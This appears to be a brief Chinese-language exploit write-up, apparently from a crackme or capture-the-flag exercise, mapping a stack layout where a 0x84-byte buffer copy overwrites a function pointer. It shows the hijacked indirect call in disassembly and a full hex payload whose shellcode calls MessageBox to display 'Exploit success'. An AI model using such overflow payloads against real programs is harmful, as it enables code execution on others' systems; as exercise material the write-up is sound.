栈结构
12FC64 函数栈顶
...
12FC74  函数地址 (休眠)
...
12FC78 0x84大小 buff拷贝到这里
...
12FCF8  函数地址(MSG)  <-- 被上面最后4字节溢出
12FCFC 堆copy到这里
...
12FD7C buff首址
0040115C   |.  8B9424 A4000000     MOV EDX,DWORD PTR SS:[ESP+A4]
00401163   |.  8D8C24 A4000000     LEA ECX,DWORD PTR SS:[ESP+A4]
0040116A   |.  FF12                           CALL DWORD PTR DS:[EDX]             ；原来MessageBox被溢出

Offset      0  1  2  3  4  5  6  7   8  9  A  B  C  D  E  F

00000000   7C FC 12 00 6A 00 68 6C  60 40 00 68 98 FC 12 00   |?.j.hl`@.h橖..
00000010   6A 00 FF 15 10 85 40 00  00 00 00 00 00 00 00 00   j...匑.........
00000020   45 00 78 00 70 00 6C 00  6F 00 69 00 74 00 20 00   E.x.p.l.o.i.t. .
00000030   73 00 75 00 63 00 63 00  65 00 73 00 73 00 00 00   s.u.c.c.e.s.s...
00000040   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   ................
00000050   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   ................
00000060   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   ................
00000070   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   ................
00000080   78 FC 12 00                                        x?.

悲剧啊， 末班车也没搭上！